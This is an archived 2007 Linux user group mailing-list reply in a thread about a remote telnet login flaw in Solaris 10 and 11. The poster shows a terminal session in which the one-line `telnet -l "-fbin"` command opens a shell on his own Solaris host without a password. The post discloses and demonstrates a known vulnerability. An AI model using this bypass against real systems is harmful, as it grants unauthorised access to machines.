Re: Remote root telnet exploit on Solaris 10 and 11

From: adam bultman <adamb@glaven.org>
Date: Mon Feb 12 2007 - 22:51:30 AKST

I just had some fun on my solaris workstation at work. That's scary.

[10:48 abultman@nibbler :~]$telnet -l "-fbin" zoidberg
Trying 64.4.226.23...
Connected to zoidberg.
Escape character is '^]'.
Last login: Mon Feb 12 22:43:35 from nibbler
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
-sh:
PATH=/usr/bin::/usr/ccs/bin/:/usr/sbin:/opt/csw/bin:/opt/csw/sbin:/sbin:/opt/csw/gcc/bin:/opt/munin/sbin:/usr/sbin:
is not an identifier
$

>
>> From: Jon Reynolds <jonr@destar.net>
>> Reply-To: jonr@destar.net
>> To: aklug@aklug.org
>> Subject: Re: Remote root telnet exploit on Solaris 10 and 11
>> Date: Mon, 12 Feb 2007 19:32:47 -0900
>>
>>
>>
>>> Now, if someone starts posting Windows vulns here ... that's a
>>> different story. :)
>>>
>>> Royce
>>>
>> If they start doing that they shall be beaten about the head and
>> shoulders with blunt objects.
>>
>>

---------
To unsubscribe, send email to <aklug-request@aklug.org>
with 'unsubscribe' in the message body.
Received on Mon Feb 12 22:52:51 2007

This archive was generated by hypermail 2.1.8 : Mon Feb 12 2007 - 22:52:51 AKST